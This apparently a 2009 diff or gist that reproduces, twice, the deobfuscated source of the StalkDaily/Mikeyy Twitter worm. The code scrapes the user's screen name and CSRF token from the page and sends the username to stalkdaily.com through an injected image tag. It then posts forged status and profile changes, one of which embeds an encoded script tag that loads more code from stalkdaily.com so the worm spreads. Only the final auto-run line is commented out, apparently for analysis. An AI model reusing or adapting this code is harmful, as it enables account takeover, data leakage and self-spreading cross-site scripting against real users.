voxpelli · April 13, 2009 10:22
diff --git a/stalkdaily_worm.js b/stalkdaily_worm.js
 var _strings = [
  "Msxml2.XMLHTTP",     //0 0x0
  "Microsoft.XMLHTTP",
  "connect",
  "toUpperCase",
  "GET",
  "?",                  //5 0x5
  "open",
  "",
  "Method",
  "POST ",
  " HTTP/1.1",          //10 0xa
  "setRequestHeader",
  "Content-Type",
  "application/x-www-form-urlencoded; charset=UTF-8",
  "onreadystatechange",
  "readyState",         //15 0xf
  "send",
  "split",
  "join",
  "'",
  "%27",                //20 0x14
  "(",
  "%28",
  ")",
  "%29",
  "*",                  //25 0x19
  "%2A",
  "~",
  "%7E",
  "!",
  "%21",                //30 0x1e (?)
  "%20",
  "+",
  "%",
  "replace",
  "innerHTML",          //35 0x23
  "documentElement",
  "exec",
  "<img src='http://www.stalkdaily.com/x.php?username=",
  "'>",
  "write",              //40 0x28
  "Twitter, hire Mikeyy! (718) 312-8131 :)",
  "random",             //42 0x2a
  "length",             //43 0x2b
  "floor",              //44 0x2c
  "\" > <title > <script > document.write(String.fromCharCode(60, 115, 99, 114, 105, 112, 116, 32, 115, 114, 99, 61, 34, 104, 116, 116, 112, 58, 47, 47, 119, 119, 119, 46, 115, 116, 97, 108, 107, 100, 97, 105, 108, 121, 46, 99, 111, 109, 47, 97, 106, 97, 120, 46, 106, 115, 34, 62, 60, 47, 115, 99, 114, 105, 112, 116, 62)); < /script>",
  "/status / update ",  //46 0x2e
  "POST ",
  "authenticity_token = ",
  " & status = ",
  " & return_rendered_status = true & twttr = true ",
  " / account / settings ",
  " & user[name] = ",   //52 0x34
  " & user[protected] = 0 & commit = Save ",
  " / account / profile_settings ",
  " & user[profile_default] = false & tab = colors & profile_theme = 1 & user[profile_background_color] = ",
  "##Mikeyy ",
  " & user[url] = Mikeyy+++++++++++++++++++++++++++++++++++++&commit = save changes ",
  " & user[url] = Mikeyy+++++++++++++++++++++++++++++++++++++&user[protected] = 0 & commit = Save ",
  " & commit = save changes ",
  "wait()"              //60 0x3c
 ];
 function XHConn() {
    var xmlhttp,
    bComplete = false;
    try {
        xmlhttp = new ActiveXObject(_strings[0x0]);
    } catch(e) {
        try {
            xmlhttp = new ActiveXObject(_strings[0x1]);
        } catch(e) {
            try {
                xmlhttp = new XMLHttpRequest();
            } catch(e) {
                xmlhttp = false;
            };
        };
    };
    if (!xmlhttp) {
        return null;
    };
    this[_strings[0x2]] = function(sURL, sMethod, sVars, fnDone) {
        if (!xmlhttp) {
            return false;
        };
        bComplete = false;
        sMethod = sMethod[_strings[0x3]]();
        try {
            if (sMethod == _strings[0x4]) {
                xmlhttp[_strings[0x6]](sMethod, sURL + _strings[0x5] + sVars, true);
                sVars = _strings[0x7];
            } else {
                xmlhttp[_strings[0x6]](sMethod, sURL, true);
                xmlhttp[_strings[0xb]](_strings[0x8], _strings[0x9] + sURL + _strings[0xa]);
                xmlhttp[_strings[0xb]](_strings[0xc], _strings[0xd]);
            };
            xmlhttp[_strings[0xe]] = function() {
                if (xmlhttp[_strings[0xf]] == 0x4 && !bComplete) {
                    bComplete = true;
                    if (fnDone != null) {
                        fnDone(xmlhttp);
                    };
                };
            };
            xmlhttp[_strings[0x10]](sVars);
        } catch(z) {
            return false;
        };
        return true;
    };
    return this;
 };
 function urlencode(str) {
    var histogram = {},
    tmp_arr = [];
    var ret = str.toString();
    var replacer = function(search, replace, str) {
        var tmp_arr = [];
        tmp_arr = str[_strings[0x11]](search);
        return tmp_arr[_strings[0x12]](replace);
    };
    histogram[_strings[0x13]] = _strings[0x14];
    histogram[_strings[0x15]] = _strings[0x16];
    histogram[_strings[0x17]] = _strings[0x18];
    histogram[_strings[0x19]] = _strings[0x1a];
    histogram[_strings[0x1b]] = _strings[0x1c];
    histogram[_strings[0x1d]] = _strings[0x1e];
    histogram[_strings[0x1f]] = _strings[0x20];
    ret = encodeURIComponent(ret);
    for (search in histogram) {
        replace = histogram[search];
        ret = replacer(search, replace, ret);
    };
    return ret[_strings[0x22]](/(\%([a-z0-9]{2}))/g,
    function(full, m1, m2) {
        return _strings[0x21] + m2[_strings[0x3]]();
    });
    return ret;
 };
 function wait() {
    var content = document[_strings[0x24]][_strings[0x23]];
    userreg = new RegExp(/<meta content=" (. * )" name="session - user - screen_name "/g);
    var username = userreg[_strings[0x25]](content);
    username = username[0x1];
    document[_strings[0x28]](_strings[0x26] + username + _strings[0x27]);
    authreg = new RegExp(/twttr.form_authenticity_token = '(.*)';/g);
    var authtoken = authreg[_strings[0x25]](content);
    authtoken = authtoken[0x1];
    var randomUpdate = new Array();
    randomUpdate[0x0] = _strings[0x29];
    var genRand = randomUpdate[Math[_strings[0x2c]](Math[_strings[0x2a]]() * randomUpdate[_strings[0x2b]])];
    var updateEncode = urlencode(genRand);
    var newSettings = new Array();
    newSettings[0x0] = _strings[0x2d]; //This fetches the string that is going to be inserted as a new name
    var newName = newSettings[Math[_strings[0x2c]](Math[_strings[0x2a]]() * newSettings[_strings[0x2b]])]; //newSettings[Math.floor(Math.random() * newSettings.length)];
    var newNameEncode = urlencode(newName);
    var _0x1b68x1d = new XHConn();
    _0x1b68x1d[_strings[0x2]]("/status / update ", "POST ", "authenticity_token = " + authtoken + " & status = " + updateEncode + " & return_rendered_status = true & twttr = true ");
    var _0x1b68x1e = new XHConn();
    _0x1b68x1e[_strings[0x2]](" / account / settings ", "POST ", "authenticity_token = " + authtoken + " & user[name] = " + newNameEncode + " & user[protected] = 0 & commit = Save ");
    var _0x1b68x1f = new XHConn();
    _0x1b68x1f[_strings[0x2]](" / account / profile_settings ", "POST ", "authenticity_token = " + authtoken + " & user[profile_default] = false & tab = colors & profile_theme = 1 & user[profile_background_color] = " + urlencode("##Mikeyy ") + " & user[url] = Mikeyy+++++++++++++++++++++++++++++++++++++&commit = save changes ");
    var xmlhttp0 = new XHConn();
    xmlhttp0[_strings[0x2]](" / account / settings ", "POST ", "authenticity_token = " + authtoken + " & user[name] = " + newNameEncode + " & user[url] = Mikeyy+++++++++++++++++++++++++++++++++++++&user[protected] = 0 & commit = Save ");
    var xmlhttp1 = new XHConn();
    xmlhttp1[_strings[0x2]](" / account / profile_settings ", "POST ", "authenticity_token = " + authtoken + " & user[profile_default] = false & tab = colors & profile_theme = 1 & user[profile_background_color] = " + urlencode("##Mikeyy ") + " & user[name] = " + newNameEncode + " & commit = save changes ");
    var xmlhttp2 = new XHConn();
    xmlhttp2[_strings[0x2]](" / account / settings ", "POST ", "authenticity_token = " + authtoken + " & user[name] = " + newNameEncode + " & user[protected] = 0 & commit = Save ");
 };
 //Commented out as to not be another host of a working script
 //setTimeout(_strings[0x3c], 3550);
	var _strings = [
	"Msxml2.XMLHTTP", //0 0x0
	"Microsoft.XMLHTTP",
	"connect",
	"toUpperCase",
	"GET",
	"?", //5 0x5
	"open",
	"",
	"Method",
	"POST ",
	" HTTP/1.1", //10 0xa
	"setRequestHeader",
	"Content-Type",
	"application/x-www-form-urlencoded; charset=UTF-8",
	"onreadystatechange",
	"readyState", //15 0xf
	"send",
	"split",
	"join",
	"'",
	"%27", //20 0x14
	"(",
	"%28",
	")",
	"%29",
	"*", //25 0x19
	"%2A",
	"~",
	"%7E",
	"!",
	"%21", //30 0x1e (?)
	"%20",
	"+",
	"%",
	"replace",
	"innerHTML", //35 0x23
	"documentElement",
	"exec",
	"<img src='http://www.stalkdaily.com/x.php?username=",
	"'>",
	"write", //40 0x28
	"Twitter, hire Mikeyy! (718) 312-8131 :)",
	"random", //42 0x2a
	"length", //43 0x2b
	"floor", //44 0x2c
	"\" > <title > <script > document.write(String.fromCharCode(60, 115, 99, 114, 105, 112, 116, 32, 115, 114, 99, 61, 34, 104, 116, 116, 112, 58, 47, 47, 119, 119, 119, 46, 115, 116, 97, 108, 107, 100, 97, 105, 108, 121, 46, 99, 111, 109, 47, 97, 106, 97, 120, 46, 106, 115, 34, 62, 60, 47, 115, 99, 114, 105, 112, 116, 62)); < /script>",
	"/status / update ", //46 0x2e
	"POST ",
	"authenticity_token = ",
	" & status = ",
	" & return_rendered_status = true & twttr = true ",
	" / account / settings ",
	" & user[name] = ", //52 0x34
	" & user[protected] = 0 & commit = Save ",
	" / account / profile_settings ",
	" & user[profile_default] = false & tab = colors & profile_theme = 1 & user[profile_background_color] = ",
	"##Mikeyy ",
	" & user[url] = Mikeyy+++++++++++++++++++++++++++++++++++++&commit = save changes ",
	" & user[url] = Mikeyy+++++++++++++++++++++++++++++++++++++&user[protected] = 0 & commit = Save ",
	" & commit = save changes ",
	"wait()" //60 0x3c
	];
	function XHConn() {
	var xmlhttp,
	bComplete = false;
	try {
	xmlhttp = new ActiveXObject(_strings[0x0]);
	} catch(e) {
	try {
	xmlhttp = new ActiveXObject(_strings[0x1]);
	} catch(e) {
	try {
	xmlhttp = new XMLHttpRequest();
	} catch(e) {
	xmlhttp = false;
	};
	};
	};
	if (!xmlhttp) {
	return null;
	};
	this[_strings[0x2]] = function(sURL, sMethod, sVars, fnDone) {
	if (!xmlhttp) {
	return false;
	};
	bComplete = false;
	sMethod = sMethod[_strings[0x3]]();
	try {
	if (sMethod == _strings[0x4]) {
	xmlhttp[_strings[0x6]](sMethod, sURL + _strings[0x5] + sVars, true);
	sVars = _strings[0x7];
	} else {
	xmlhttp[_strings[0x6]](sMethod, sURL, true);
	xmlhttp[_strings[0xb]](_strings[0x8], _strings[0x9] + sURL + _strings[0xa]);
	xmlhttp[_strings[0xb]](_strings[0xc], _strings[0xd]);
	};
	xmlhttp[_strings[0xe]] = function() {
	if (xmlhttp[_strings[0xf]] == 0x4 && !bComplete) {
	bComplete = true;
	if (fnDone != null) {
	fnDone(xmlhttp);
	};
	};
	};
	xmlhttp[_strings[0x10]](sVars);
	} catch(z) {
	return false;
	};
	return true;
	};
	return this;
	};
	function urlencode(str) {
	var histogram = {},
	tmp_arr = [];
	var ret = str.toString();
	var replacer = function(search, replace, str) {
	var tmp_arr = [];
	tmp_arr = str[_strings[0x11]](search);
	return tmp_arr[_strings[0x12]](replace);
	};
	histogram[_strings[0x13]] = _strings[0x14];
	histogram[_strings[0x15]] = _strings[0x16];
	histogram[_strings[0x17]] = _strings[0x18];
	histogram[_strings[0x19]] = _strings[0x1a];
	histogram[_strings[0x1b]] = _strings[0x1c];
	histogram[_strings[0x1d]] = _strings[0x1e];
	histogram[_strings[0x1f]] = _strings[0x20];
	ret = encodeURIComponent(ret);
	for (search in histogram) {
	replace = histogram[search];
	ret = replacer(search, replace, ret);
	};
	return ret[_strings[0x22]](/(\%([a-z0-9]{2}))/g,
	function(full, m1, m2) {
	return _strings[0x21] + m2[_strings[0x3]]();
	});
	return ret;
	};
	function wait() {
	var content = document[_strings[0x24]][_strings[0x23]];
	userreg = new RegExp(/<meta content=" (. * )" name="session - user - screen_name "/g);
	var username = userreg[_strings[0x25]](content);
	username = username[0x1];
	document[_strings[0x28]](_strings[0x26] + username + _strings[0x27]);
	authreg = new RegExp(/twttr.form_authenticity_token = '(.*)';/g);
	var authtoken = authreg[_strings[0x25]](content);
	authtoken = authtoken[0x1];
	var randomUpdate = new Array();
	randomUpdate[0x0] = _strings[0x29];
	var genRand = randomUpdate[Math[_strings[0x2c]](Math[_strings[0x2a]]() * randomUpdate[_strings[0x2b]])];
	var updateEncode = urlencode(genRand);
	var newSettings = new Array();
	newSettings[0x0] = _strings[0x2d]; //This fetches the string that is going to be inserted as a new name
	var newName = newSettings[Math[_strings[0x2c]](Math[_strings[0x2a]]() * newSettings[_strings[0x2b]])]; //newSettings[Math.floor(Math.random() * newSettings.length)];
	var newNameEncode = urlencode(newName);
	var _0x1b68x1d = new XHConn();
	_0x1b68x1d[_strings[0x2]]("/status / update ", "POST ", "authenticity_token = " + authtoken + " & status = " + updateEncode + " & return_rendered_status = true & twttr = true ");
	var _0x1b68x1e = new XHConn();
	_0x1b68x1e[_strings[0x2]](" / account / settings ", "POST ", "authenticity_token = " + authtoken + " & user[name] = " + newNameEncode + " & user[protected] = 0 & commit = Save ");
	var _0x1b68x1f = new XHConn();
	_0x1b68x1f[_strings[0x2]](" / account / profile_settings ", "POST ", "authenticity_token = " + authtoken + " & user[profile_default] = false & tab = colors & profile_theme = 1 & user[profile_background_color] = " + urlencode("##Mikeyy ") + " & user[url] = Mikeyy+++++++++++++++++++++++++++++++++++++&commit = save changes ");
	var xmlhttp0 = new XHConn();
	xmlhttp0[_strings[0x2]](" / account / settings ", "POST ", "authenticity_token = " + authtoken + " & user[name] = " + newNameEncode + " & user[url] = Mikeyy+++++++++++++++++++++++++++++++++++++&user[protected] = 0 & commit = Save ");
	var xmlhttp1 = new XHConn();
	xmlhttp1[_strings[0x2]](" / account / profile_settings ", "POST ", "authenticity_token = " + authtoken + " & user[profile_default] = false & tab = colors & profile_theme = 1 & user[profile_background_color] = " + urlencode("##Mikeyy ") + " & user[name] = " + newNameEncode + " & commit = save changes ");
	var xmlhttp2 = new XHConn();
	xmlhttp2[_strings[0x2]](" / account / settings ", "POST ", "authenticity_token = " + authtoken + " & user[name] = " + newNameEncode + " & user[protected] = 0 & commit = Save ");
	};
	//Commented out as to not be another host of a working script
	//setTimeout(_strings[0x3c], 3550);